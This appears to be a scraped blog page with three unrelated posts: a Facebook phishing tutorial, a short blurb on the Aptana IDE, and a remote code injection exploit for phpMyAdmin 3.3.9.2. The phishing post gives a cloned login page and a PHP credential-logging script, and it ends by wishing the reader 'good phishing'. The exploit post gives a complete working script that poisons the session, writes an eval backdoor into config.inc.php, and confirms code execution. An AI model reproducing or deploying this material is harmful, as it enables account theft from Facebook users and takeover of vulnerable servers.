Facebook Phishing


Today we are going to make a phisher for facebook.

1) go to facebook, and view the source, copy all the text to notepad.

2) we need to change some codes so press: Control + F

3) search for action

4) You should get: action=www.facebook.com/login and bla bla bla

5) delete all the facebook.com crap, and put: lol.php

6) beside action you will see something saying: method=post

7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change

it to “all files” this is very important

9) make a new file in notepad, and put this code:

<?php

header(”Location: http://www.Facebook.com/login.php “);

$handle = fopen(”passwords.txt”, “a”);

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

10) now save it as lol.php and remember the save as file type to all files.

11) now, make a new file in notepad, dont write anything, save it as: passwords.txt

12) now upload all of them in www.t35.com

good luck and good phishing!

Aptana


Application: Aptana

What it is:

The professional, open source development tool for the open web
Develop and test your entire web application using a single
environment. With support for the latest browser technology specs such
as HTML5, CSS3 and JavaScript; and Ruby, Rails, PHP & Python on the
server side.

Core Features:

* HTML, CSS, and JavaScript Code Assist
* Git Integration
* Deployment Wizard
* Built-in Terminal
* Integrated Debugger
* IDE Customization

To know more about:

http://www.aptana.com/

To download:

http://www.aptana.com/products/radrails/download

To install on Ubuntu:

http://maketecheasier.com/install-aptana-studio-in-ubuntu-intrepid/2009/03/23

Remote Code Injection


 i tried to share what i known for who interested...USE RESPONSIBLY.

<?php echo php_sapi_name()!=='cli'?'</pre>':'';

if(php_sapi_name()==='cli'){
    if(!isset($argv[1])){
        output("   Usage\n    ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
        killme();
    }
    $pmaurl = $argv[1];
}else{
    $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code   = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token  = null;
if(!function_exists('curl_init')){
    output('[!] Fatal error. Need cURL!');
    killme();
}
$ch     = curl_init();
$debug  = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}

output("[i] Running...");

// Start a session and get a token
curl_setopt_array($ch, array(
    CURLOPT_URL => $pmaurl.'/setup/index.php',
    CURLOPT_HEADER => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 4,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");

$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
    output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
    killme();
}
if(!$result){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
    output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
    killme();
}

// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);

// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
    output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
    output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
    output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}

curl_close($ch);

function output($msg){
    echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
    flush();
}

function killme(){
    output("[*] Exiting...");
    echo php_sapi_name()!=='cli'?'<pre>':'';
    die();
}

echo php_sapi_name()!=='cli'?'<pre>':'';?>